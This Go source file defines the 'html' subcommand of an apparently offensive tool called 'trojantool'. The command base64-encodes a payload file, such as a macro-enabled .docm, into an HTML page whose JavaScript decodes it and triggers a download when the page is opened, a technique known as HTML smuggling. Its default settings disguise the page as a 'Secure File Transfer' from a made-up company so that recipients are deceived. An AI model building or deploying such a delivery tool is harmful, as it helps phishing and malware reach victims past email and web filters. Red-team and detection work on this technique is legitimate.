package cmd

import (
	_ "embed"
	"encoding/base64"
	"github.com/spf13/cobra"
	"html/template"
	"os"
	"time"
)

//go:embed html.gohtml
var htmlTmpl string

// htmlCmd represents the html command
var htmlCmd = &cobra.Command{
	Use:   "html [flags] payload",
	Short: "Wraps Payload into HTML file",
	Long: `This takes the Payload, encodes it in Base64 and embeds it into a HTML file. 
If the file is opened, the file is decoded using Javascript and "downloaded. 
Example:

trojantool html --output document.html --filename Document.docm Document.docm
`,
	Run: func(cmd *cobra.Command, args []string) {
		type OutData struct {
			Title      string
			Encoded    string
			Filename   string
			Year       int
			FooterName string
			FooterURL  string
		}

		var outData OutData
		tmpl := template.Must(template.New("").Parse(htmlTmpl))
		if len(args) != 1 {
			cmd.PrintErr("Please specify one Input file! \n")
			_ = cmd.Help()
			os.Exit(1)
		}
		input := args[0]
		if input == "" {
			cmd.PrintErr("You need to specify an input file!")
		}
		output, _ := cmd.Flags().GetString("output")
		outData.Title, _ = cmd.Flags().GetString("title")
		outData.FooterName, _ = cmd.Flags().GetString("footer-name")
		outData.FooterURL, _ = cmd.Flags().GetString("footer-url")
		outData.Filename = input
		outData.Year = time.Now().Year()

		content, err := os.ReadFile(input)
		if err != nil {
			cmd.PrintErrf("Could not read Input file: %s", err)
		}
		outData.Encoded = base64.StdEncoding.EncodeToString(content)

		outFile, err := os.Create(output)
		if err != nil {
			cmd.PrintErrf("Could not create output file: %s", err)
		}
		defer func(outFile *os.File) {
			err := outFile.Close()
			if err != nil {

			}
		}(outFile)
		err = tmpl.Execute(outFile, outData)
		if err != nil {
			cmd.PrintErrf("Could not create output file: %s", err)
		}

	},
}

func init() {
	rootCmd.AddCommand(htmlCmd)

	// Here you will define your flags and configuration settings.
	htmlCmd.Flags().String("output", "Secure.html", "This is the Name of the Output file")
	htmlCmd.Flags().String("title", "Secure File Transfer", "This is the Title of the HTML page")
	htmlCmd.Flags().String("filename", "Document.docm", "Name of the File that gets Downloaded")
	htmlCmd.Flags().String("footer-name", "Made Up, Inc", "Name of the Company in the Footer")
	htmlCmd.Flags().String("footer-url", "https://madeupinc.com", "Name of the Company in the Footer")
}
